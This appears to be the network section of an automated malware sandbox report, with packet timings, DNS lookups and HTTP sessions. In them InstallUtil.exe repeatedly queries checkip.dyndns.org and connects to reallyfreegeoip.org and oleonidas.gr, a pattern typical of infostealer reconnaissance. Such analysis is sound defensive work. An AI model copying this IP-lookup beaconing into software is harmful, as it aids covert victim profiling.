                                                            Nov 8, 2024 11:51:33.471381903 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:33.471446991 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:33.471702099 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:33.471762896 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:33.587626934 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:33.587699890 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:33.587713957 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:33.587727070 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:33.587733984 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:33.587778091 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:33.587785006 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:33.587801933 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:33.587992907 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:33.588738918 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:33.588819027 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:33.703136921 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:33.703217983 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:33.703677893 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:33.703737020 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:33.704267979 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:33.704333067 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:33.704864025 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:33.705023050 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:33.705745935 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:33.705807924 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:33.820020914 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:33.820097923 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:33.820561886 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:33.820647955 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:33.821707964 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:33.821763992 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:33.822607040 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:33.822650909 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:33.822683096 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:33.822691917 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:33.822730064 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:33.822737932 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:33.824110985 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:33.824177027 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:33.937427044 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:33.937510014 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:33.938054085 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:33.938113928 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:33.938627958 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:33.938695908 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:33.939409018 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:33.939471006 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:33.940040112 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:33.940095901 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:34.054004908 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:34.054084063 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:34.054521084 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:34.054604053 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:34.055299997 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:34.055366993 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:34.055833101 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:34.055895090 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:34.056236982 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:34.056301117 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:34.056909084 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:34.056972027 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:34.171049118 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:34.171122074 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:34.171777964 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:34.171844006 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:34.172406912 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:34.172475100 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:34.173046112 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:34.173110962 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:34.173738003 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:34.173806906 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:34.174453974 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:34.174519062 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:34.288033009 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:34.288116932 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:34.288662910 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:34.288738012 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:34.289469957 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:34.289542913 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:34.289856911 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:34.289937973 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:34.290901899 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:34.290976048 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:34.291317940 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:34.291388035 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:34.412595034 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:34.412683010 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:34.418425083 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:34.418539047 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:34.429652929 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:34.429763079 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:34.441364050 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:34.441442013 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:34.448801994 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:34.448863029 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:34.456522942 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:34.456593037 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:34.524734974 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:34.524848938 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:34.532293081 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:34.532398939 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:34.532561064 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:34.532737970 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:34.533118963 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:34.533163071 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:34.533224106 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:34.533224106 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:34.533235073 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:34.533340931 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:34.534266949 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:34.534326077 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:34.534373045 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:34.534384012 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:34.534396887 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:34.534419060 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:34.563786030 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:34.563889027 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:34.654551029 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:34.654603958 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:34.654648066 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:34.654654980 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:34.654701948 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:34.654701948 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:34.655332088 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:34.655456066 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:34.655925989 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:34.655966043 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:34.656018972 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:34.656023979 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:34.656054974 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:34.656071901 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:34.656826973 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:34.656891108 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:34.656894922 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:34.656914949 CET44349722185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:34.657030106 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:34.659605026 CET49722443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:36.207947969 CET4975880192.168.2.5193.122.6.168
                                                            Nov 8, 2024 11:51:36.212739944 CET8049758193.122.6.168192.168.2.5
                                                            Nov 8, 2024 11:51:36.213510990 CET4975880192.168.2.5193.122.6.168
                                                            Nov 8, 2024 11:51:36.213725090 CET4975880192.168.2.5193.122.6.168
                                                            Nov 8, 2024 11:51:36.218856096 CET8049758193.122.6.168192.168.2.5
                                                            Nov 8, 2024 11:51:37.082256079 CET8049758193.122.6.168192.168.2.5
                                                            Nov 8, 2024 11:51:37.086359978 CET4975880192.168.2.5193.122.6.168
                                                            Nov 8, 2024 11:51:37.091156960 CET8049758193.122.6.168192.168.2.5
                                                            Nov 8, 2024 11:51:37.336745977 CET8049758193.122.6.168192.168.2.5
                                                            Nov 8, 2024 11:51:37.373476028 CET49765443192.168.2.5188.114.96.3
                                                            Nov 8, 2024 11:51:37.373516083 CET44349765188.114.96.3192.168.2.5
                                                            Nov 8, 2024 11:51:37.373703957 CET49765443192.168.2.5188.114.96.3
                                                            Nov 8, 2024 11:51:37.378398895 CET49765443192.168.2.5188.114.96.3
                                                            Nov 8, 2024 11:51:37.378416061 CET44349765188.114.96.3192.168.2.5
                                                            Nov 8, 2024 11:51:37.385956049 CET4975880192.168.2.5193.122.6.168
                                                            Nov 8, 2024 11:51:37.984519958 CET44349765188.114.96.3192.168.2.5
                                                            Nov 8, 2024 11:51:37.984621048 CET49765443192.168.2.5188.114.96.3
                                                            Nov 8, 2024 11:51:37.986052990 CET49765443192.168.2.5188.114.96.3
                                                            Nov 8, 2024 11:51:37.986058950 CET44349765188.114.96.3192.168.2.5
                                                            Nov 8, 2024 11:51:37.986358881 CET44349765188.114.96.3192.168.2.5
                                                            Nov 8, 2024 11:51:38.026591063 CET49765443192.168.2.5188.114.96.3
                                                            Nov 8, 2024 11:51:38.037405968 CET49765443192.168.2.5188.114.96.3
                                                            Nov 8, 2024 11:51:38.079338074 CET44349765188.114.96.3192.168.2.5
                                                            Nov 8, 2024 11:51:38.173525095 CET44349765188.114.96.3192.168.2.5
                                                            Nov 8, 2024 11:51:38.173619986 CET44349765188.114.96.3192.168.2.5
                                                            Nov 8, 2024 11:51:38.173696041 CET49765443192.168.2.5188.114.96.3
                                                            Nov 8, 2024 11:51:38.176398039 CET49765443192.168.2.5188.114.96.3
                                                            Nov 8, 2024 11:51:38.181536913 CET4975880192.168.2.5193.122.6.168
                                                            Nov 8, 2024 11:51:38.186292887 CET8049758193.122.6.168192.168.2.5
                                                            Nov 8, 2024 11:51:38.431886911 CET8049758193.122.6.168192.168.2.5
                                                            Nov 8, 2024 11:51:38.434803009 CET49771443192.168.2.5188.114.96.3
                                                            Nov 8, 2024 11:51:38.434818983 CET44349771188.114.96.3192.168.2.5
                                                            Nov 8, 2024 11:51:38.434974909 CET49771443192.168.2.5188.114.96.3
                                                            Nov 8, 2024 11:51:38.435249090 CET49771443192.168.2.5188.114.96.3
                                                            Nov 8, 2024 11:51:38.435259104 CET44349771188.114.96.3192.168.2.5
                                                            Nov 8, 2024 11:51:38.479711056 CET4975880192.168.2.5193.122.6.168
                                                            Nov 8, 2024 11:51:39.032574892 CET44349771188.114.96.3192.168.2.5
                                                            Nov 8, 2024 11:51:39.034318924 CET49771443192.168.2.5188.114.96.3
                                                            Nov 8, 2024 11:51:39.034349918 CET44349771188.114.96.3192.168.2.5
                                                            Nov 8, 2024 11:51:39.173832893 CET44349771188.114.96.3192.168.2.5
                                                            Nov 8, 2024 11:51:39.173939943 CET44349771188.114.96.3192.168.2.5
                                                            Nov 8, 2024 11:51:39.177155972 CET49771443192.168.2.5188.114.96.3
                                                            Nov 8, 2024 11:51:39.177962065 CET49771443192.168.2.5188.114.96.3
                                                            Nov 8, 2024 11:51:39.181014061 CET4975880192.168.2.5193.122.6.168
                                                            Nov 8, 2024 11:51:39.182190895 CET4977680192.168.2.5193.122.6.168
                                                            Nov 8, 2024 11:51:39.186455011 CET8049758193.122.6.168192.168.2.5
                                                            Nov 8, 2024 11:51:39.186515093 CET4975880192.168.2.5193.122.6.168
                                                            Nov 8, 2024 11:51:39.186959982 CET8049776193.122.6.168192.168.2.5
                                                            Nov 8, 2024 11:51:39.188992977 CET4977680192.168.2.5193.122.6.168
                                                            Nov 8, 2024 11:51:39.189116001 CET4977680192.168.2.5193.122.6.168
                                                            Nov 8, 2024 11:51:39.193909883 CET8049776193.122.6.168192.168.2.5
                                                            Nov 8, 2024 11:51:40.044169903 CET8049776193.122.6.168192.168.2.5
                                                            Nov 8, 2024 11:51:40.045207977 CET49782443192.168.2.5188.114.96.3
                                                            Nov 8, 2024 11:51:40.045247078 CET44349782188.114.96.3192.168.2.5
                                                            Nov 8, 2024 11:51:40.045337915 CET49782443192.168.2.5188.114.96.3
                                                            Nov 8, 2024 11:51:40.045545101 CET49782443192.168.2.5188.114.96.3
                                                            Nov 8, 2024 11:51:40.045558929 CET44349782188.114.96.3192.168.2.5
                                                            Nov 8, 2024 11:51:40.089180946 CET4977680192.168.2.5193.122.6.168
                                                            Nov 8, 2024 11:51:40.653253078 CET44349782188.114.96.3192.168.2.5
                                                            Nov 8, 2024 11:51:40.670753956 CET49782443192.168.2.5188.114.96.3
                                                            Nov 8, 2024 11:51:40.670782089 CET44349782188.114.96.3192.168.2.5
                                                            Nov 8, 2024 11:51:40.805301905 CET44349782188.114.96.3192.168.2.5
                                                            Nov 8, 2024 11:51:40.805387020 CET44349782188.114.96.3192.168.2.5
                                                            Nov 8, 2024 11:51:40.805444956 CET49782443192.168.2.5188.114.96.3
                                                            Nov 8, 2024 11:51:40.806344986 CET49782443192.168.2.5188.114.96.3
                                                            Nov 8, 2024 11:51:40.837605000 CET4978780192.168.2.5193.122.6.168
                                                            Nov 8, 2024 11:51:40.842447996 CET8049787193.122.6.168192.168.2.5
                                                            Nov 8, 2024 11:51:40.842519045 CET4978780192.168.2.5193.122.6.168
                                                            Nov 8, 2024 11:51:40.842951059 CET4978780192.168.2.5193.122.6.168
                                                            Nov 8, 2024 11:51:40.847929001 CET8049787193.122.6.168192.168.2.5
                                                            Nov 8, 2024 11:51:41.689235926 CET8049787193.122.6.168192.168.2.5
                                                            Nov 8, 2024 11:51:41.692125082 CET49791443192.168.2.5188.114.96.3
                                                            Nov 8, 2024 11:51:41.692157984 CET44349791188.114.96.3192.168.2.5
                                                            Nov 8, 2024 11:51:41.692229986 CET49791443192.168.2.5188.114.96.3
                                                            Nov 8, 2024 11:51:41.692430973 CET49791443192.168.2.5188.114.96.3
                                                            Nov 8, 2024 11:51:41.692440033 CET44349791188.114.96.3192.168.2.5
                                                            Nov 8, 2024 11:51:41.745445013 CET4978780192.168.2.5193.122.6.168
                                                            Nov 8, 2024 11:51:42.299093008 CET44349791188.114.96.3192.168.2.5
                                                            Nov 8, 2024 11:51:42.300858974 CET49791443192.168.2.5188.114.96.3
                                                            Nov 8, 2024 11:51:42.300867081 CET44349791188.114.96.3192.168.2.5
                                                            Nov 8, 2024 11:51:42.448082924 CET44349791188.114.96.3192.168.2.5
                                                            Nov 8, 2024 11:51:42.448151112 CET44349791188.114.96.3192.168.2.5
                                                            Nov 8, 2024 11:51:42.448317051 CET49791443192.168.2.5188.114.96.3
                                                            Nov 8, 2024 11:51:42.449404955 CET49791443192.168.2.5188.114.96.3
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 8, 2024 11:51:10.357927084 CET | 53315 | 53 | 192.168.2.5 | 1.1.1.1
Nov 8, 2024 11:51:10.495960951 CET | 53 | 53315 | 1.1.1.1 | 192.168.2.5
Nov 8, 2024 11:51:16.676836967 CET | 63052 | 53 | 192.168.2.5 | 1.1.1.1
Nov 8, 2024 11:51:16.908659935 CET | 53 | 63052 | 1.1.1.1 | 192.168.2.5
Nov 8, 2024 11:51:18.096364021 CET | 54687 | 53 | 192.168.2.5 | 1.1.1.1
Nov 8, 2024 11:51:18.105474949 CET | 53 | 54687 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 8, 2024 11:51:10.357927084 CET | 192.168.2.5 | 1.1.1.1 | 0xd85b | Standard query (0) | www.oleonidas.gr | A (IP address) | IN (0x0001) | false
Nov 8, 2024 11:51:16.676836967 CET | 192.168.2.5 | 1.1.1.1 | 0x2f3c | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Nov 8, 2024 11:51:18.096364021 CET | 192.168.2.5 | 1.1.1.1 | 0x79bc | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 8, 2024 11:51:10.495960951 CET | 1.1.1.1 | 192.168.2.5 | 0xd85b | No error (0) | www.oleonidas.gr | oleonidas.gr | | CNAME (Canonical name) | IN (0x0001) | false
Nov 8, 2024 11:51:10.495960951 CET | 1.1.1.1 | 192.168.2.5 | 0xd85b | No error (0) | oleonidas.gr | | 185.78.221.73 | A (IP address) | IN (0x0001) | false
Nov 8, 2024 11:51:16.908659935 CET | 1.1.1.1 | 192.168.2.5 | 0x2f3c | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 8, 2024 11:51:16.908659935 CET | 1.1.1.1 | 192.168.2.5 | 0x2f3c | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Nov 8, 2024 11:51:16.908659935 CET | 1.1.1.1 | 192.168.2.5 | 0x2f3c | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Nov 8, 2024 11:51:16.908659935 CET | 1.1.1.1 | 192.168.2.5 | 0x2f3c | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Nov 8, 2024 11:51:16.908659935 CET | 1.1.1.1 | 192.168.2.5 | 0x2f3c | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Nov 8, 2024 11:51:16.908659935 CET | 1.1.1.1 | 192.168.2.5 | 0x2f3c | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Nov 8, 2024 11:51:18.105474949 CET | 1.1.1.1 | 192.168.2.5 | 0x79bc | No error (0) | reallyfreegeoip.org | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Nov 8, 2024 11:51:18.105474949 CET | 1.1.1.1 | 192.168.2.5 | 0x79bc | No error (0) | reallyfreegeoip.org | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                                                            • www.oleonidas.gr
                                                            • reallyfreegeoip.org
                                                            • checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49705 | 193.122.6.168 | 80 | 360 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
Nov 8, 2024 11:51:16.920197964 CET | 151 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
Nov 8, 2024 11:51:17.763024092 CET | 323 | IN | HTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:17 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 334a490ad260327979edcdfd1def81e1
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>
Nov 8, 2024 11:51:17.800525904 CET | 127 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
Nov 8, 2024 11:51:18.049206972 CET | 323 | IN | HTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:17 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 1c396028f0adc8a7ea360359325a0f9c
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>
Nov 8, 2024 11:51:19.100511074 CET | 127 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
Nov 8, 2024 11:51:19.350430965 CET | 323 | IN | HTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:19 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: afe94d57159cd598952cd54c9f53afec
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49708 | 193.122.6.168 | 80 | 360 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
Nov 8, 2024 11:51:20.153701067 CET | 127 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
Nov 8, 2024 11:51:21.291215897 CET | 323 | IN | HTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:21 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 68b6595f5d09befe09a08c49d1cf6807
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49710 | 193.122.6.168 | 80 | 360 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
Nov 8, 2024 11:51:22.065687895 CET | 151 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
Nov 8, 2024 11:51:22.936543941 CET | 323 | IN | HTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:22 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: c75841dbd51539538e279a09769d9937
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
